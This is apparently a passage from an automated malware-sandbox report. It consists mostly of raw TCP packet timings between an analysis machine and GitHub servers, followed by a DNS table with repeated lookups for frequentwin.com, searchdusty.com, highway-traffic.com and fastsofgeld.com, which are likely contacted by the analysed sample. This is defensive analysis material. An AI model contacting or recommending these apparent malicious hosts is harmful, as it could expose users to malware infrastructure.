                                                                                                                                                Sep 29, 2022 14:51:43.216922998 CEST49743443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:43.216933012 CEST44349743185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:43.216970921 CEST49743443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:43.217144966 CEST49743443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:43.380672932 CEST44349743185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:43.380752087 CEST44349743185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:43.380784035 CEST44349743185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:43.380871058 CEST49743443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:43.380929947 CEST49743443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:43.381696939 CEST49743443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:43.844700098 CEST49744443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:43.844764948 CEST44349744140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:43.844851971 CEST49744443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:43.845298052 CEST49744443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:43.845330954 CEST44349744140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:43.887355089 CEST44349744140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:43.892251968 CEST49744443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:43.892292976 CEST44349744140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.065087080 CEST44349744140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.065287113 CEST44349744140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.065413952 CEST49744443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:44.065448046 CEST44349744140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.065481901 CEST44349744140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.066013098 CEST49744443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:44.066046953 CEST49744443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:44.068551064 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.068598032 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.068820953 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.069351912 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.069389105 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.114325047 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.116270065 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.116312981 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.413790941 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.413912058 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.413964033 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.413991928 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.414010048 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.414027929 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.414050102 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.414102077 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.414136887 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.414149046 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.414278030 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.414324045 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.414328098 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.414344072 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.414381981 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.414391041 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.415112972 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.415189981 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.415198088 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.418564081 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.418613911 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.418718100 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.418734074 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.418798923 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.430352926 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.430397034 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.430577040 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.430603981 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.433131933 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.433182001 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.433310032 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.433326006 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.434781075 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.434835911 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.434926987 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.434942007 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.434967995 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.437067032 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.437114954 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.437186003 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.437199116 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.437232971 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.445729971 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.445775032 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.445909023 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.445930958 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.447191954 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.447238922 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.447303057 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.447314024 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.447345018 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.448084116 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.448117018 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.448230982 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.448240042 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.449383974 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.449425936 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.449496031 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.449506044 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.449544907 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.450732946 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.450767994 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.450820923 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.450829983 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.450856924 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.451502085 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.451545000 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.451590061 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.451596975 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.451621056 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.452958107 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.452994108 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.453044891 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.453053951 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.453075886 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.453468084 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.453509092 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.453532934 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.453540087 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.453569889 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.460513115 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.460557938 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.460628986 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.460665941 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.460666895 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.460695982 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.460712910 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.460742950 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.461796045 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.461838961 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.461894989 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.461905956 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.461925983 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.461945057 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.462690115 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.462727070 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.462784052 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.462793112 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.462824106 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.462845087 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.463321924 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.463356972 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.463418961 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.463428020 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.463465929 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.463808060 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.463840008 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.463897943 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.463905096 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.463965893 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.464807987 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.464845896 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.464927912 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.464935064 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.464972973 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.465436935 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.465470076 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.465523005 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.465529919 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.465569019 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.465708017 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.465734005 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.465786934 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.465794086 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.465806961 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.465850115 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.465856075 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.465883970 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.465894938 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.465914965 CEST44349745185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.465961933 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.468524933 CEST49745443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:44.738645077 CEST49746443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:44.738718987 CEST44349746140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.738822937 CEST49746443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:44.739203930 CEST49746443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:44.739238024 CEST44349746140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.780826092 CEST44349746140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:44.782574892 CEST49746443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:44.782617092 CEST44349746140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.269746065 CEST44349746140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.269834995 CEST44349746140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.269906044 CEST44349746140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.269961119 CEST49746443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:45.270005941 CEST49746443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:45.270764112 CEST49746443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:45.271991014 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.272066116 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.272176027 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.272681952 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.272710085 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.314385891 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.316569090 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.316621065 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.507746935 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.510317087 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.510354042 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.510464907 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.510512114 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.510535002 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.510571957 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.512943983 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.512981892 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.513089895 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.513122082 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.524888992 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.524946928 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.525116920 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.525172949 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.527326107 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.527371883 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.527470112 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.527513981 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.527533054 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.529800892 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.529850006 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.529925108 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.529954910 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.529980898 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.530708075 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.530741930 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.530797005 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.530822992 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.530842066 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.541147947 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.541205883 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.541354895 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.541409016 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.542928934 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.542965889 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.543051958 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.543093920 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.543118954 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.544176102 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.544220924 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.544289112 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.544317961 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.544342041 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.545852900 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.545886993 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.545934916 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.545968056 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.545994997 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.546555042 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.546591043 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.546638012 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.546658993 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.546695948 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.547410011 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.547444105 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.547499895 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.547529936 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.547554970 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.548904896 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.548944950 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.549010992 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.549040079 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.549060106 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.549398899 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.549424887 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.549458027 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.549474955 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.549494982 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.556560040 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.556612015 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.556724072 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.556782961 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.556812048 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.557455063 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.557495117 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.557600975 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.557622910 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.557791948 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.557826042 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.557871103 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.557885885 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.557910919 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.558476925 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.558511019 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:45.558597088 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.558597088 CEST49747443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:45.558617115 CEST44349747185.199.108.133192.168.2.5
                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Sep 29, 2022 14:51:11.914669991 CEST192.168.2.58.8.8.80x6329Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:51:12.789417028 CEST192.168.2.58.8.8.80x871dStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:38.290690899 CEST192.168.2.58.8.8.80x5642Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:39.752437115 CEST192.168.2.58.8.8.80x9f09Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:40.685794115 CEST192.168.2.58.8.8.80xea37Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:40.747608900 CEST192.168.2.58.8.8.80x51deStandard query (0)searchdusty.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:41.876140118 CEST192.168.2.58.8.8.80x2413Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:41.950319052 CEST192.168.2.58.8.8.80x346Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:42.198441982 CEST192.168.2.58.8.8.80xc1c5Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:43.217318058 CEST192.168.2.58.8.8.80xaf75Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:43.253565073 CEST192.168.2.58.8.8.80x7160Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:43.585851908 CEST192.168.2.58.8.8.80x59ffStandard query (0)frequentwin.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:46.065675020 CEST192.168.2.58.8.8.80xcb06Standard query (0)highway-traffic.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:47.857027054 CEST192.168.2.58.8.8.80xf236Standard query (0)fastsofgeld.comA (IP address)IN (0x0001)false
                                                                                                                                                Sep 29, 2022 14:52:49.174622059 CEST192.168.2.58.8.8.80x45a4Standard query (0)frequentwin.comA (IP address)IN (0x0001)false
